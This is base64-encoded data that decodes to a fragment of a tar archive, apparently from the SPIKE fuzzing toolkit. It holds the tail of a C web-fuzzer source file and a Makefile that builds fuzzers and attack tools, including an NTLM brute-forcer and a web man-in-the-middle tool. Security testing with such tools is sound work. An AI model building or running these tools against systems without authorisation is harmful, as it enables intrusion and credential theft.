	Z2UgaW50ZW50aW9uYWxseSBsZWZ0IGJsYW5rLiIpKQoJCWJyZWFrOwogICAgICAgICAgICAgICB9

	CgkgICAgfS8qZW5kIHdoaWxlIHJlYWQgbG9vcCovCiAgICAgICAgICAgICAgIHByaW50ZigiRW5k

	IHJlc3BvbnNlXG4iKTsKICAgICAgICAgIGZ1enpzdHJudW0rKzsKCSAgc19pbmNyZW1lbnRmdXp6

	c3RyaW5nKCk7CgkgIC8vCSAgc3Bpa2VfY2xvc2VfdGNwKCk7CgkgIC8qVXNlIHRoaXMgZm9yIHRl

	c3RpbmcgYWdhaW5zdCBuZXRjYXQqLwoJICAvKgoJICAgIHNsZWVwKDEpOwoJICAqLwoJfS8qZW5k

	IGZvciBlYWNoIGZ1enogc3RyaW5nKi8KICAgICAgZnV6enZhcm51bSsrOwogICAgICBzX2luY3Jl

	bWVudGZ1enp2YXJpYWJsZSgpOwogICAgfS8qZW5kIGZvciBlYWNoIHZhcmlhYmxlKi8KICBwcmlu

	dGYoIkRvbmUuXG4iKTsKICByZXR1cm4gMDsKfSAvKmVuZCBwcm9ncmFtKi8KCi8qIEVuZCB3ZWJm

	dXp6cG9zdGx1ZGUuYyAqLyAKCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATWFrZWZpbGUAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAxMDA2NDQAMDAwMDc2NQAwMDAwNzY1ADAwMDAwMDA3

	MTAyADA3NTAzNjY1NTMxADAxMTE2MwAgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAB1c3RhciAgAGRhdmUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGF2ZQAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuU1VGRklYRVM6IC5hIC5vIC5j

	CkNDCQk9ICBnY2MKQ0ZMQUdTCQk9ICAtV2FsbCAtZnVuc2lnbmVkLWNoYXIgLWMgLWZQSUMgLWdn

	ZGIKCiN3ZWJmdXp6IGdvZXMgbGFzdCBzbyB3ZSBkb24ndCBjcmFzaCBvbiBpdCBlYXJseS4uLgoK

	QklOUyA9IHNzX3NwaWtlIHBtc3Bpa2Ugc3RhdGRfc3Bpa2UgeDExX3NwaWtlIHBvc3RfZnV6eiBw

	b3N0X3NwaWtlIG1zcnBjZnV6eiBkb19wb3N0IHdlYm1pdG0gY2l0cml4IG50bG0yIG50bG1fYnJ1

	dGUgY2xvc2VkX3NvdXJjZV93ZWJfc2VydmVyX2Z1enogcXVha2VzZXJ2ZXIgcXVha2UgaGFsZmxp

	ZmUgb2xkbXNycGNmdXp6IHdlYmZ1enogZGx0ZXN0IGdvcGhlcmQgZ2VuZXJpY19saXN0ZW5fdGNw

	IGxpYmRscnBjLnNvIGdlbmVyaWNfd2ViX3NlcnZlcl9mdXp6IGdlbmVyaWNfY2h1bmtlZAoKCkFM

	TCA9ICQoQklOUykKCklOQ0xVREUgPSAtSS91c3IvbG9jYWwvaW5jbHVkZSAtSS4uL2luY2x1ZGUg

	IC1JbGlibnRsbS0wLjIxLwoKTElCU09DS0VUID0gCgpTUElLRV9PQlMgPSBzcGlrZS5vIGxpc3Rl

	bmVyLm8gaGRlYnVnLm8gdGNwc3R1ZmYubyBzcGlrZV9kY2VycGMubyBiYXNlNjQubyB1ZHBzdHVm

	Zi5vCgpTU19PQlMgPSAkKFNQSUtFX09CUykgc3Nfc3Bpa2UubwoKUE1fT0JTID0gJChTUElLRV9P

	QlMpIHBtc3Bpa2UubwoKU0RfT0JTID0gJChTUElLRV9PQlMpIHN0YXRkX3NwaWtlLm8KClgxMV9P

	QlM9ICQoU1BJS0VfT0JTKSB4MTFfc3Bpa2UubwoKUFNfT0JTPSAkKFNQSUtFX09CUykgcG9zdF9z

	cGlrZS5vCgoKU1BJS0VfSEVBREVSUyA9IC4uL2luY2x1ZGUvc3Bpa2UuaCAKCkhDX0xJQlMgPSAk

	KExJQlNPQ0tFVCkgCgoKLmMubzoKCSR7Q0N9ICR7Q0ZMQUdTfSAke0lOQ0xVREV9ICQ8CgphbGw6

	ICQoQUxMKQoKc3Nfc3Bpa2U6ICQoU1NfT0JTKQoJJChDQykgLW8gc3Nfc3Bpa2UgJChTU19PQlMp

	CgpwbXNwaWtlOiAkKFBNX09CUykKCSQoQ0MpIC1vIHBtc3Bpa2UgJChQTV9PQlMpCgpzdGF0ZF9z

	cGlrZTogJChTRF9PQlMpCgkkKENDKSAtbyBzdGF0ZF9zcGlrZSAkKFNEX09CUykKCngxMV9zcGlr

	ZTogJChYMTFfT0JTKQoJJChDQykgLW8geDExX3NwaWtlICQoWDExX09CUykKCnBvc3Rfc3Bpa2U6

	ICQoUFNfT0JTKQoJJChDQykgLW8gcG9zdF9zcGlrZSAkKFBTX09CUykKCndlYmZ1eno6ICQoU1BJ

	S0VfT0JTKSB3ZWJmdXp6Lm8KCSQoQ0MpIC1vIHdlYmZ1enogJChTUElLRV9PQlMpIHdlYmZ1enou

	bwoKZ29waGVyZDogJChTUElLRV9PQlMpIGdvcGhlcmQubwoJJChDQykgLW8gZ29waGVyZCAkKFNQ

	SUtFX09CUykgZ29waGVyZC5vCgpwb3N0X2Z1eno6ICQoU1BJS0VfT0JTKSBwb3N0X2Z1enoubwoJ

	JChDQykgLW8gcG9zdF9mdXp6ICQoU1BJS0VfT0JTKSBwb3N0X2Z1enoubwoKCmNsb3NlZF9zb3Vy

	Y2Vfd2ViX3NlcnZlcl9mdXp6OiAkKFNQSUtFX09CUykgY2xvc2VkX3NvdXJjZV93ZWJfc2VydmVy

	X2Z1enoubwoJJChDQykgLW8gY2xvc2VkX3NvdXJjZV93ZWJfc2VydmVyX2Z1enogJChTUElLRV9P

	QlMpIGNsb3NlZF9zb3VyY2Vfd2ViX3NlcnZlcl9mdXp6Lm8KCm1zcnBjZnV6ejogJChTUElLRV9P

	QlMpIG1zcnBjZnV6ei5vCgkkKENDKSAtZ2dkYiAtbyBtc3JwY2Z1enogJChTUElLRV9PQlMpIG1z

	cnBjZnV6ei5vCgpvbGRtc3JwY2Z1eno6ICQoU1BJS0VfT0JTKSBvbGRtc3JwY2Z1enoubwoJJChD

	QykgLWdnZGIgLW8gb2xkbXNycGNmdXp6ICQoU1BJS0VfT0JTKSBvbGRtc3JwY2Z1enoubwoKZG9f

	cG9zdDogJChTUElLRV9PQlMpIGRvX3Bvc3QubwoJJChDQykgLWdnZGIgLW8gZG9fcG9zdCAkKFNQ

	SUtFX09CUykgZG9fcG9zdC5vCgpudGxtX2JydXRlOiAkKFNQSUtFX09CUykgbnRsbV9icnV0ZS5v

	IGxpYm50bG0tMC4yMS9saWJudGxtLmEKCSQoQ0MpIC1nZ2RiIC1vIG50bG1fYnJ1dGUgICQoU1BJ

	S0VfT0JTKSBudGxtX2JydXRlLm8gbGlibnRsbS0wLjIxL2xpYm50bG0uYQoKbnRsbTI6ICQoU1BJ

	S0VfT0JTKSBudGxtMi5vIGxpYm50bG0tMC4yMS9saWJudGxtLmEKCSQoQ0MpIC1nZ2RiIC1vIG50

	bG0yICAkKFNQSUtFX09CUykgbnRsbTIubyBsaWJudGxtLTAuMjEvbGlibnRsbS5hCgoKbGlibnRs

	bS0wLjIxL2xpYm50bG0uYTogCgljZCBsaWJudGxtLTAuMjEgJiYgbWFrZQoKd2VibWl0bTogd2Vi

	bWl0bS5vIGJ1Zi5vCgkkKENDKSAtZ2dkYiAtbyB3ZWJtaXRtIHdlYm1pdG0ubyBidWYubyAtbHNz

	bAogCmNpdHJpeDogY2l0cml4Lm8gJChTUElLRV9PQlMpCgkkKENDKSAtZ2dkYiAtbyBjaXRyaXgg

	Y2l0cml4Lm8gJChTUElLRV9PQlMpCgpoYWxmbGlmZTogaGFsZmxpZmUubyAkKFNQSUtFX09CUykK

	CSQoQ0MpIC1nZ2RiIC1vIGhhbGZsaWZlIGhhbGZsaWZlLm8gJChTUElLRV9PQlMpCgpxdWFrZTog

	cXVha2UubyAkKFNQSUtFX09CUykKCSQoQ0MpICAtZ2dkYiAtbyBxdWFrZSBxdWFrZS5vICAkKFNQ

	SUtFX09CUykKCnF1YWtlc2VydmVyOiBxdWFrZXNlcnZlci5vICQoU1BJS0VfT0JTKQoJJChDQykg

	IC1nZ2RiIC1vIHF1YWtlc2VydmVyIHF1YWtlc2VydmVyLm8gICQoU1BJS0VfT0JTKQoKZGx0ZXN0

	OiBkbHRlc3QubyBkbHJwYy5vIGRsYXJncy5vCgkkKENDKSAtZ2dkYiAtbyBkbHRlc3QgZGx0ZXN0

	Lm8gZGxycGMubyBkbGFyZ3MubyAtbGRsCgojdGhpcyBuZXh0IGxpbmUgbWF5IGJlIGxlc3MgdGhh

	biBwb3J0YWJsZQpsaWJkbHJwYy5zbzogZGxycGMubyBkbGFyZ3MubyAkKFNQSUtFX09CUykKCWxk

	ICAgLXNoYXJlZCAtc29uYW1lIGxpYmRscnBjLnNvIC1vIGxpYmRscnBjLnNvIC1sYyAgZGxycGMu

	byBkbGFyZ3MubyAkKFNQSUtFX09CUykKCmdlbmVyaWNfbGlzdGVuX3RjcDogZ2VuZXJpY19saXN0

	ZW5fdGNwLm8gZGxycGMubyBkbGFyZ3MubyAkKFNQSUtFX09CUykgbGliZGxycGMuc28KCWV4cG9y

	dCBMRF9MSUJSQVJZX1BBVEg9LjokKExEX0xJQlJBUllfUEFUSCkKCSQoQ0MpIC1nZ2RiIC1vIGdl

	bmVyaWNfbGlzdGVuX3RjcCBnZW5lcmljX2xpc3Rlbl90Y3AubyBkbHJwYy5vIGRsYXJncy5vICQo

	U1BJS0VfT0JTKSAtbGRsIC1MLiAtbGRscnBjCgpnZW5lcmljX3dlYl9zZXJ2ZXJfZnV6ejogZ2Vu

	ZXJpY193ZWJfc2VydmVyX2Z1enoubyBkbHJwYy5vIGRsYXJncy5vICQoU1BJS0VfT0JTKSBsaWJk

	bHJwYy5zbwoJZXhwb3J0IExEX0xJQlJBUllfUEFUSD0uOiQoTERfTElCUkFSWV9QQVRIKQoJJChD

	QykgLWdnZGIgLW8gZ2VuZXJpY193ZWJfc2VydmVyX2Z1enogZ2VuZXJpY193ZWJfc2VydmVyX2Z1

	enoubyBkbHJwYy5vIGRsYXJncy5vICQoU1BJS0VfT0JTKSAtbGRsIC1MLiAtbGRscnBjCgpnZW5l

	cmljX2NodW5rZWQ6IGdlbmVyaWNfY2h1bmtlZC5vIGRsYXJncy5vICQoU1BJS0VfT0JTKSBsaWJk

	bHJwYy5zbwoJZXhwb3J0IExEX0xJQlJBUllfUEFUSD0uOiQoTERfTElCUkFSWV9QQVRIKQoJJChD

	QykgLWdnZGIgLW8gZ2VuZXJpY19jaHVua2VkIGdlbmVyaWNfY2h1bmtlZC5vIGRscnBjLm8gZGxh

	cmdzLm8gJChTUElLRV9PQlMpIC1sZGwgLUwuIC1sZGxycGMKCgoKY2xlYW46CglybSAtZiAqfiAq

	LmJhawoJcm0gLWYgaW5jbHVkZS8qfiBpbmNsdWRlLyouYmFrCglybSAtZiAqLm8gJChCSU5TKQoJ

	Y2QgbGlibnRsbS0wLjIxICYmIG1ha2UgY2xlYW4KCnJlYWxjbGVhbjogY2xlYW4KCXJtIC1yZiAj

	KiAqLnN3cCAqfiBjb3JlCglscyAtYWwgb3V0KiAqLnR4dAoKCgoKCgAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

